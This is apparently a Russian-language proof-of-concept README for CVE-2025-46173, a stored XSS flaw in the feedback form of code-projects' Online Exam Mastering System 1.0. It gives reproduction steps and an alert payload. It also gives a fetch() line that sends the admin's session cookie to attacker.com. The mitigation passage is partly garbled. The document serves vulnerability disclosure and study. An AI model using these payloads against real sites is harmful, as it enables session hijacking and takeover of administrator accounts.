
poc for the CVE-2025-46173
CVE-2025-46173 — это уязвимость межсайтового скриптинга с сохранением (XSS), обнаруженная в Online Exam Mastering System 1.0 от code-projects. Уязвимость присутствует в компоненте feedback.php, где ввод пользователя в поле имени недостаточно очищается, что позволяет злоумышленнику внедрить произвольный JavaScript. Когда администратор просматривает этот отзыв в панели управления (dash.php), нагрузка выполняется в браузере администратора, что приводит к перехвату сессии и потенциальному повышению привилегий.
feedback.php, dash.phpПользователь отправляет следующую нагрузку в поле Имя в форме обратной связи:
<script>alert(document.cookie)</script>

Когда администратор позже просматривает отправленный отзыв в dash.php, нагрузка выполняется:

Сессионный cookie администратора становится доступным через document.cookie, который может быть извлечен:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Клонируйте или настройте уязвимую версию с code-projects.
Перейдите по адресу localhost/exam/feedback.php.
Заполните поле "Имя" следующим:
<script>alert(document.cookie)</script>
Отправьте форму.
Войдите как администратор и перейдите на dash.php?q=3, чтобы просмотреть отзывы.
Скрипт выполнится в контексте администратора.
&, <, >, ").htmlspecialchars() в PHP, или комбинацию проверки на фронтенде и очистки на бэкенде.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
Скриншоты предназначены только для образовательных целей. Все тестирование проводилось в локальной среде.
Нажмите здесь, чтобы посмотреть демонстрационное видео
Эта информация предоставляется только в образовательных и исследовательских целях. Не используйте ее в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.